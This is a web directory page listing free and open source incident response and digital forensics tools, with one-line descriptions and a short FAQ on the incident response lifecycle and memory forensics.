Free Incident Response Tools
Respond to security incidents effectively with free and open source tools. Browse digital forensics, incident response platforms, memory analysis, and log analysis tools for DFIR teams.
Showing 24 of 164 tools
mvt
mvt-project/mvt
MVT (Mobile Verification Toolkit) helps with conducting forensics of mobile devices in order to find signs of a potential compromise.
post-mortems
danluu/post-mortems
A collection of postmortems. Sorry for the delay in merging PRs!
Detect-It-Easy
horsicq/Detect-It-Easy
Program for determining types of files for Windows, Linux and MacOS.
howtheysre
upgundecha/howtheysre
A curated collection of publicly available resources on how technology and tech-savvy organizations around the world practice Site Reliability Engineering (SRE)
awesome-incident-response
meirwah/awesome-incident-response
A curated list of tools for incident response
chainsaw
WithSecureLabs/chainsaw
Rapidly Search and Hunt through Windows Forensic Artefacts
tracecat
TracecatHQ/tracecat
All-in-one AI automation platform (workflows, agents, cases, tables) for security, IT, and production engineering teams.
timesketch
google/timesketch
Collaborative forensic timeline analysis
CAPEv2
kevoreilly/CAPEv2
Malware Configuration And Payload Extraction
GScan
grayddq/GScan
本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。
Digital-Forensics-Guide
mikeroyal/Digital-Forensics-Guide
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
digital-forensics-lab
frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty
MemLabs
stuxnet999/MemLabs
Educational, CTF-styled labs for individuals interested in Memory Forensics
PcapXray
Srinivas11789/PcapXray
:snowflake: PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
RecoverPy
PabloLec/RecoverPy
Interactively find and recover deleted or :point_right: overwritten :point_left: files from your terminal
Qu1cksc0pe
CYB3RMX/Qu1cksc0pe
All-in-One malware analysis tool.
Incident-Playbook
austinsonger/Incident-Playbook
GOAL: Incident Response Playbooks Mapped to MITRE Attack Tactics and Techniques. [Contributors Friendly]
beagle
yampelo/beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
uac
tclahr/uac
UAC is a powerful and extensible incident response tool designed for forensic investigators, security analysts, and IT professionals. It automates the collection of artifacts from a wide range of Unix-like systems, including AIX, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris.
DumpsterFire
TryCatchHCF/DumpsterFire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
strelka
target/strelka
Real-time, container-based file scanning at enterprise scale
awesome-anti-forensic
shadawck/awesome-anti-forensic
Tools and packages that are used for countering forensic activities, including encryption, steganography, and anything that modify attributes. This all includes tools to work with anything in general that makes changes to a system for the purposes of hiding information.
DataSurgeon
Drew-Alleman/DataSurgeon
Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers and a lot More From Text
Kuiper
DFIRKuiper/Kuiper
Digital Forensics Investigation Platform
Related Security Domains
Frequently Asked Questions
What is the incident response lifecycle?
The NIST incident response lifecycle has four phases: Preparation (building capabilities before incidents), Detection & Analysis (identifying and understanding incidents), Containment, Eradication & Recovery (stopping and removing the threat), and Post-Incident Activity (lessons learned). Tools support each phase.
What is the best free incident response platform?
TheHive is the leading open source security incident response platform, providing case management, task tracking, and integration with threat intelligence tools like MISP and Cortex. It's designed for SOC teams and supports collaborative investigation workflows.
What tools are used in digital forensics?
Key open source DFIR tools include Autopsy (disk forensics), Volatility (memory forensics), Plaso (timeline analysis), KAPE (artifact collection), and Velociraptor (live forensics and threat hunting). The SANS SIFT Workstation bundles many of these tools in a pre-configured Linux environment.
How do I perform memory forensics?
Volatility Framework is the standard open source tool for memory forensics. It analyzes RAM dumps to extract running processes, network connections, loaded drivers, and injected code. Rekall is an alternative framework. Memory forensics is critical for detecting fileless malware and advanced persistent threats.